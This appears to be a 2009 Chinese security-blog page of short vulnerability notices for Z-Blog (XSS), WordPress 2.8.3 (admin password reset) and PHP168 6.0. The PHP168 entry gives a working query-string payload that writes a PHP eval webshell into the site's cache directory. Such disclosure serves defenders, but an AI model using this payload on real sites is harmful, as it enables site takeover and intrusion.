-
2009-09-19
Zblog所有版本Xss漏洞 - [最新漏洞]
作者:van
Blog:www.ghostvan.cn
测试环境:Vmware, z-blog1.8
影响版本:通杀
被动式攻击:zblog XSS 最新可用.
为了原创,出血了,看了一下,都几个月了,还没补,官方也有此洞. -
2009-09-18
WordPress < = 2.8.3 Remote admin reset password - [最新漏洞]
可以直接重置管理员的密码,但是无法获得重置后的密码,
因为重置后的密码是发到管理员信箱的,除非你把管理员的信箱也拿到。
WordPress 的 trac 上也已经发了修复的信息Changeset [11797] - Changeset [11804] 。
在用 WordPress 的同学来这里下载 wp-login.php 覆盖一下吧。
ps:我今天下午就被某人日了一下,密码被重置,发到我邮箱了。
=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
============================================= -
2009-09-18
PHP168 6.0及以下版本漏洞 - [最新漏洞]
来源:chinesehonker
危险等级:高
影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。
测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?
共1页 1
